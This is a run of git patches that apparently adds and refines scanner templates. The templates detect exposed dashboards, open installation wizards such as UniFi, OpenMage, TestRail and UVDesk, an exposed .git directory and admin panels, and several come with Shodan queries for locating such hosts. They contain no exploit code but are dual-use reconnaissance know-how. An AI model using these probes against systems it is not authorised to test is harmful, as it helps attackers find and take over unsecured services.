37aad09586ba84b61eb7de0a7fe4ee7021c7aa18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 18:10:08 +0000 Subject: [PATCH 0123/1415] Auto Generated CVE annotations [Thu Nov 10 18:10:08 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 7ee9c9a037e84bdbd975514f4f452755b361ba1d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 00:00:29 +0530 Subject: [PATCH 0124/1415] Update system-properties-exposure.yaml --- misconfiguration/system-properties-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/system-properties-exposure.yaml b/misconfiguration/system-properties-exposure.yaml index d2cfa965d1..2ae0216e0f 100644 --- a/misconfiguration/system-properties-exposure.yaml +++ b/misconfiguration/system-properties-exposure.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - "System Properties" + - "System Properties:" - "Environment Variables:" condition: and From 8d02bf6d659221cc8d6d3ca42af52d0183cabb7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 18:41:22 +0000 Subject: [PATCH 0125/1415] Auto Generated New Template Addition List [Thu Nov 10 18:41:22 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 21680711a9..ab32d0862c 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ misconfiguration/encompass-cm1-homepage.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml +misconfiguration/system-properties-exposure.yaml network/detection/ibm-d2b-database-server-detect.yaml network/detection/mikrotik-routeros-api-detect.yaml technologies/aem-cms.yaml From 632b2d2979db707c7191af0bc0de5ae6c858dea7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 18:56:18 +0000 Subject: [PATCH 0126/1415] Auto Generated CVE annotations [Thu Nov 10 18:56:18 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 3e0bc132c00381201f8d91f4138c8e2365d102b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 00:34:08 +0530 Subject: [PATCH 0127/1415] Update hydra-dashboard.yaml --- misconfiguration/hydra-dashboard.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/misconfiguration/hydra-dashboard.yaml b/misconfiguration/hydra-dashboard.yaml index 1ea71a601f..e8a14ce061 100644 --- a/misconfiguration/hydra-dashboard.yaml +++ b/misconfiguration/hydra-dashboard.yaml @@ -23,11 +23,6 @@ requests: - "screen: 'dashboard'" condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 6b2b69be6935615cecb9364d57ad45e913dc8da3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 19:08:12 +0000 Subject: [PATCH 0128/1415] Auto Generated New Template Addition List [Thu Nov 10 19:08:12 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ab32d0862c..a637d57bd5 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ misconfiguration/ace-admin-dashboard.yaml misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml +misconfiguration/hydra-dashboard.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml From 5900e0258cd51a8839770f0a1d4aba6375d234d4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 01:48:50 +0530 Subject: [PATCH 0129/1415] Update zebra-printer-detect.yaml --- iot/zebra-printer-detect.yaml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/iot/zebra-printer-detect.yaml b/iot/zebra-printer-detect.yaml index 9abdae529e..e522a7abc0 100644 --- a/iot/zebra-printer-detect.yaml +++ b/iot/zebra-printer-detect.yaml @@ -1,7 +1,7 @@ id: zebra-printer-detect info: - name: Zebra Printer detection + name: Zebra Printer Detection author: gy741 severity: info reference: @@ -18,11 +18,7 @@ requests: - type: word part: body words: - - 'https://www.zebra.com' - - 'www.zebra.com/support.html' - - 'config.html' - 'Zebra Technologies' - condition: and - type: status status: From 21c4759175c2afb7ea6c8bc2bb9898839959c8f2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 05:24:30 +0530 Subject: [PATCH 0130/1415] Update zebra-printer-detect.yaml --- iot/zebra-printer-detect.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/iot/zebra-printer-detect.yaml b/iot/zebra-printer-detect.yaml index e522a7abc0..76cef05357 100644 --- a/iot/zebra-printer-detect.yaml +++ b/iot/zebra-printer-detect.yaml @@ -6,6 +6,9 @@ info: severity: info reference: - https://www.zebra.com/kr/ko/products/printers.html + metadata: + verified: true + shodan-query: html:"Zebra Technologies" tags: iot,zebra requests: @@ -19,6 +22,8 @@ requests: part: body words: - 'Zebra Technologies' + - 'PrintServer' + condition: and - type: status status: From 9c692fad220746a4c3e0fc6dd8e250650f58e887 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 10 Nov 2022 23:56:34 +0000 Subject: [PATCH 0131/1415] Auto Generated New Template Addition List [Thu Nov 10 23:56:34 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a637d57bd5..9ce7b103db 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/deluge-webui-panel.yaml exposed-panels/mailhog-panel.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml +iot/zebra-printer-detect.yaml misconfiguration/ace-admin-dashboard.yaml misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml From eb54eaa69368f6da42d8043c203fb1c874ea25b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 05:35:40 +0530 Subject: [PATCH 0132/1415] Create ray-dashboard.yaml --- misconfiguration/ray-dashboard.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/ray-dashboard.yaml diff --git a/misconfiguration/ray-dashboard.yaml b/misconfiguration/ray-dashboard.yaml new file mode 100644 index 0000000000..1af303f51c --- /dev/null +++ b/misconfiguration/ray-dashboard.yaml @@ -0,0 +1,28 @@ +id: ray-dashboard + +info: + name: Ray Dashboard Exposure + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Ray Dashboard" + tags: misconfig,exposure,ray + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ray Dashboard" + - "webpackJsonpray-dashboard-client" + condition: and + + - type: status + status: + - 200 From 2fcb3a0078684b7b9c6375d0c0d0664e058d6a7c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 05:44:47 +0530 Subject: [PATCH 0133/1415] Create puppetdb-dashboard.yaml --- misconfiguration/puppetdb-dashboard.yaml | 28 ++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/puppetdb-dashboard.yaml diff --git a/misconfiguration/puppetdb-dashboard.yaml b/misconfiguration/puppetdb-dashboard.yaml new file mode 100644 index 0000000000..7204009875 --- /dev/null +++ b/misconfiguration/puppetdb-dashboard.yaml @@ -0,0 +1,28 @@ +id: puppetdb-dashboard + +info: + name: PuppetDB Dashboard Exposure + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: 'title:"PuppetDB: Dashboard"' + tags: misconfig,exposure,puppetdb + +requests: + - method: GET + path: + - "{{BaseURL}}/pdb/dashboard/index.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PuppetDB: Dashboard" + - "/pdb/dashboard/data" + condition: and + + - type: status + status: + - 200 From 1ef6c137f9964fb5c22cc919dfcea743b7288cc3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 07:27:25 +0530 Subject: [PATCH 0134/1415] Create unifi-wizard.yaml --- misconfiguration/installer/unifi-wizard.yaml | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/unifi-wizard.yaml diff --git a/misconfiguration/installer/unifi-wizard.yaml b/misconfiguration/installer/unifi-wizard.yaml new file mode 100644 index 0000000000..f2d5c033ec --- /dev/null +++ b/misconfiguration/installer/unifi-wizard.yaml @@ -0,0 +1,28 @@ +id: unifi-wizard + +info: + name: UniFi Wizard Installer + author: DhiyaneshDk + severity: high + metadata: + verified: true + shodan-query: title:"UniFi Wizard" + tags: misconfig,unifi,install,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/manage/wizard/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "UniFi Wizard" + - "app-unifi-wizard" + condition: and + + - type: status + status: + - 200 From 0bd11668f01e68256609fbb469721c5e1fd4b59b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 07:31:27 +0530 Subject: [PATCH 0135/1415] Create openmage-install.yaml --- .../installer/openmage-install.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/openmage-install.yaml diff --git a/misconfiguration/installer/openmage-install.yaml b/misconfiguration/installer/openmage-install.yaml new file mode 100644 index 0000000000..c1dd6bb0a1 --- /dev/null +++ b/misconfiguration/installer/openmage-install.yaml @@ -0,0 +1,28 @@ +id: openmage-install + +info: + name: OpenMage Installation Wizard + author: DhiyaneshDk + severity: high + metadata: + verified: true + shodan-query: title:"OpenMage Installation Wizard" + tags: misconfig,openmage,install,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "OpenMage Installation Wizard" + - "Welcome to OpenMage's Installation Wizard!" + condition: and + + - type: status + status: + - 200 From 41e4e198293fdd18b76649edb73e21e9b8da3023 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 07:47:04 +0530 Subject: [PATCH 0136/1415] Create testrail-install.yaml --- .../installer/testrail-install.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/testrail-install.yaml diff --git a/misconfiguration/installer/testrail-install.yaml b/misconfiguration/installer/testrail-install.yaml new file mode 100644 index 0000000000..ab5dd787ff --- /dev/null +++ b/misconfiguration/installer/testrail-install.yaml @@ -0,0 +1,28 @@ +id: testrail-install + +info: + name: TestRail Installation Wizard + author: DhiyaneshDk + severity: high + metadata: + verified: true + shodan-query: title:"TestRail Installation Wizard" + tags: misconfig,testrail,install,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?/installer" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TestRail Installation Wizard" + - "Checking installation files" + condition: and + + - type: status + status: + - 200 From 8cbc69b28334362136fcacd43e2f463bc1b75a0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 07:51:37 +0530 Subject: [PATCH 0137/1415] Create uvdesk-install.yaml --- .../installer/uvdesk-install.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/installer/uvdesk-install.yaml diff --git a/misconfiguration/installer/uvdesk-install.yaml b/misconfiguration/installer/uvdesk-install.yaml new file mode 100644 index 0000000000..878913fa98 --- /dev/null +++ b/misconfiguration/installer/uvdesk-install.yaml @@ -0,0 +1,28 @@ +id: uvdesk-install + +info: + name: UVDesk Installation Wizard + author: DhiyaneshDk + severity: high + metadata: + verified: true + shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard" + tags: misconfig,uvdesk,install,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "UVDesk Helpdesk Community Edition - Installation Wizard" + - "wizardSetup" + condition: and + + - type: status + status: + - 200 From 3e147cf8ec15de3d5293777d53119d8b6de9e8d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 05:41:36 +0000 Subject: [PATCH 0139/1415] Auto Generated New Template Addition List [Fri Nov 11 05:41:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9ce7b103db..5893a7d6c7 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ misconfiguration/hydra-dashboard.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml +misconfiguration/ray-dashboard.yaml misconfiguration/system-properties-exposure.yaml network/detection/ibm-d2b-database-server-detect.yaml network/detection/mikrotik-routeros-api-detect.yaml From c0bb86973e4e800b4b51603260ef612eba072eda Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 05:56:43 +0000 Subject: [PATCH 0140/1415] Auto Generated CVE annotations [Fri Nov 11 05:56:43 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 957f6b7088942558d130591ae65b68ac7cc35bf0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:27:14 +0530 Subject: [PATCH 0141/1415] Update puppetdb-dashboard.yaml --- misconfiguration/puppetdb-dashboard.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/misconfiguration/puppetdb-dashboard.yaml b/misconfiguration/puppetdb-dashboard.yaml index 7204009875..f734d94756 100644 --- a/misconfiguration/puppetdb-dashboard.yaml +++ b/misconfiguration/puppetdb-dashboard.yaml @@ -20,8 +20,6 @@ requests: part: body words: - "PuppetDB: Dashboard" - - "/pdb/dashboard/data" - condition: and - type: status status: From 020da933eb67b0567de7c921041f5a2dfef922e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:00:11 +0000 Subject: [PATCH 0142/1415] Auto Generated New Template Addition List [Fri Nov 11 06:00:11 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5893a7d6c7..3b59e41ad5 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ misconfiguration/hydra-dashboard.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml +misconfiguration/puppetdb-dashboard.yaml misconfiguration/ray-dashboard.yaml misconfiguration/system-properties-exposure.yaml network/detection/ibm-d2b-database-server-detect.yaml From 57257b87e4623d5ef773eadb6d9d4c530c61d5a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:44:29 +0530 Subject: [PATCH 0143/1415] Update and rename unifi-wizard.yaml to unifi-wizard-install.yaml --- .../{unifi-wizard.yaml => unifi-wizard-install.yaml} | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) rename misconfiguration/installer/{unifi-wizard.yaml => unifi-wizard-install.yaml} (68%) diff --git a/misconfiguration/installer/unifi-wizard.yaml b/misconfiguration/installer/unifi-wizard-install.yaml similarity index 68% rename from misconfiguration/installer/unifi-wizard.yaml rename to misconfiguration/installer/unifi-wizard-install.yaml index f2d5c033ec..2859043f91 100644 --- a/misconfiguration/installer/unifi-wizard.yaml +++ b/misconfiguration/installer/unifi-wizard-install.yaml @@ -1,4 +1,4 @@ -id: unifi-wizard +id: unifi-wizard-install info: name: UniFi Wizard Installer @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"UniFi Wizard" - tags: misconfig,unifi,install,exposure + tags: misconfig,install,unifi,exposure requests: - method: GET @@ -26,3 +26,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "window.unifiConfig.version = '(.*)'" From 25b7deedd48bf856bd60a712c04c709720412173 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:16:38 +0000 Subject: [PATCH 0144/1415] Auto Generated New Template Addition List [Fri Nov 11 06:16:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3b59e41ad5..87eb93230e 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/hydra-dashboard.yaml +misconfiguration/installer/unifi-wizard-install.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml From d81aa2afca261b4d258105f01f84ff6b8e8a5f94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:18:36 +0000 Subject: [PATCH 0145/1415] Auto Generated CVE annotations [Fri Nov 11 06:18:36 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From de60ff8681266e929e184f5cba1308bf071dc61f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:56:53 +0530 Subject: [PATCH 0146/1415] Update openmage-install.yaml --- misconfiguration/installer/openmage-install.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/misconfiguration/installer/openmage-install.yaml b/misconfiguration/installer/openmage-install.yaml index c1dd6bb0a1..c2112278a1 100644 --- a/misconfiguration/installer/openmage-install.yaml +++ b/misconfiguration/installer/openmage-install.yaml @@ -20,8 +20,6 @@ requests: part: body words: - "OpenMage Installation Wizard" - - "Welcome to OpenMage's Installation Wizard!" - condition: and - type: status status: From 40296d07b5541ccaaf1f80f6585a403aef0330bd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 12:01:44 +0530 Subject: [PATCH 0147/1415] Update testrail-install.yaml --- misconfiguration/installer/testrail-install.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/misconfiguration/installer/testrail-install.yaml b/misconfiguration/installer/testrail-install.yaml index ab5dd787ff..83ab8cfe5d 100644 --- a/misconfiguration/installer/testrail-install.yaml +++ b/misconfiguration/installer/testrail-install.yaml @@ -20,8 +20,6 @@ requests: part: body words: - "TestRail Installation Wizard" - - "Checking installation files" - condition: and - type: status status: From 38b372c3660cf4e2b6eb3fa36fd0a5787ff3f8b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:32:49 +0000 Subject: [PATCH 0148/1415] Auto Generated New Template Addition List [Fri Nov 11 06:32:49 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 87eb93230e..598b93fbe4 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/hydra-dashboard.yaml +misconfiguration/installer/openmage-install.yaml misconfiguration/installer/unifi-wizard-install.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml From 01857b5e75f4fa2864c7891da71005f40348c8bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:35:50 +0000 Subject: [PATCH 0149/1415] Auto Generated New Template Addition List [Fri Nov 11 06:35:49 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 598b93fbe4..7e2f89569b 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ misconfiguration/confluence-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/hydra-dashboard.yaml misconfiguration/installer/openmage-install.yaml +misconfiguration/installer/testrail-install.yaml misconfiguration/installer/unifi-wizard-install.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml From ba9889b438dba22f4cffd8f234687bdc01a75417 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 11 Nov 2022 12:07:56 +0530 Subject: [PATCH 0150/1415] Update uvdesk-install.yaml --- misconfiguration/installer/uvdesk-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/installer/uvdesk-install.yaml b/misconfiguration/installer/uvdesk-install.yaml index 878913fa98..933f9aacc3 100644 --- a/misconfiguration/installer/uvdesk-install.yaml +++ b/misconfiguration/installer/uvdesk-install.yaml @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "UVDesk Helpdesk Community Edition - Installation Wizard" - - "wizardSetup" + - "UVDesk Helpdesk Community Edition" + - "Installation Wizard" condition: and - type: status From 597bf94378f0675333deb421dbb59dc45fcd482c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:41:18 +0000 Subject: [PATCH 0151/1415] Auto Generated New Template Addition List [Fri Nov 11 06:41:18 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7e2f89569b..e93ec5c0fa 100644 --- a/.new-additions +++ b/.new-additions @@ -23,6 +23,7 @@ misconfiguration/hydra-dashboard.yaml misconfiguration/installer/openmage-install.yaml misconfiguration/installer/testrail-install.yaml misconfiguration/installer/unifi-wizard-install.yaml +misconfiguration/installer/uvdesk-install.yaml misconfiguration/linktap-gateway-exposure.yaml misconfiguration/ntop-panel-exposed.yaml misconfiguration/pa11y-dashboard.yaml From e6cae5503c722d17ea27e1ca6ef2c36670efccfd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 06:46:17 +0000 Subject: [PATCH 0152/1415] Auto Generated CVE annotations [Fri Nov 11 06:46:17 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 From 88d0fab593125c7c30b2badcd9a90e93357a8625 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 15:16:30 +0530 Subject: [PATCH 0153/1415] Update and rename git-logs-exposure.yaml to git-exposure.yaml --- .../{git-logs-exposure-detect.yaml => git-exposure.yaml} | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) rename exposures/logs/{git-logs-exposure-detect.yaml => git-exposure.yaml} (75%) diff --git a/exposures/logs/git-logs-exposure-detect.yaml b/exposures/logs/git-exposure.yaml similarity index 75% rename from exposures/logs/git-logs-exposure-detect.yaml rename to exposures/logs/git-exposure.yaml index a630065870..cdcd49da30 100644 --- a/exposures/logs/git-logs-exposure-detect.yaml +++ b/exposures/logs/git-exposure.yaml @@ -1,21 +1,20 @@ -id: git-logs-exposure-detect +id: git-exposure info: - name: Git logs Exposure + name: Git Metadata Directory Exposure author: tess severity: medium metadata: verified: true - tags: logs,detect,git,exposed + tags: logs,git,exposure requests: - method: GET path: - "{{BaseURL}}/.git/" - stop-at-first-match: true host-redirects: true - max-redirects: 3 + max-redirects: 2 matchers-condition: and matchers: - type: word From c68b683eb1215bda7495598e66484fb11b2df9a1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 15:38:01 +0530 Subject: [PATCH 0154/1415] Create kaes-file-manager.yaml --- exposed-panels/kaes-file-manager.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/kaes-file-manager.yaml diff --git a/exposed-panels/kaes-file-manager.yaml b/exposed-panels/kaes-file-manager.yaml new file mode 100644 index 0000000000..c51490eeb3 --- /dev/null +++ b/exposed-panels/kaes-file-manager.yaml @@ -0,0 +1,24 @@ +id: kaes-file-manager + +info: + name: Kae's File Manager + author: princechaddha + severity: unknown + tags: panel,kaes,filemanager + +requests: + - method: GET + path: + - "{{BaseURL}}/kfm/index.php" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "File Manager - Kae's File Manager" + + - type: status + status: + - 200 From 59adfed9dd9c97d483e926deb54082b1dbc0591f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 15:40:21 +0530 Subject: [PATCH 0155/1415] Create kfm-login-panel.yaml --- exposed-panels/kfm/kfm-login-panel.yaml | 26 +++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/kfm/kfm-login-panel.yaml diff --git a/exposed-panels/kfm/kfm-login-panel.yaml b/exposed-panels/kfm/kfm-login-panel.yaml new file mode 100644 index 0000000000..6178391846 --- /dev/null +++ b/exposed-panels/kfm/kfm-login-panel.yaml @@ -0,0 +1,26 @@ +id: kfm-login-panel + +info: + name: Kae's Login Panel + author: princechaddha + severity: info + tags: panel,kfm + +requests: + - method: GET + path: + - "{{BaseURL}}/kfm/admin/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "KFM Login" + - "password" + condition: and + + - type: status + status: + - 200 From b04ac7f5f84f78b6f4c986de62326bbb1ffbce0e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 15:40:53 +0530 Subject: [PATCH 0156/1415] Update and rename exposed-panels/kaes-file-manager.yaml to exposed-panels/kfm/kaes-file-manager.yaml --- exposed-panels/{ => kfm}/kaes-file-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{ => kfm}/kaes-file-manager.yaml (91%) diff --git a/exposed-panels/kaes-file-manager.yaml 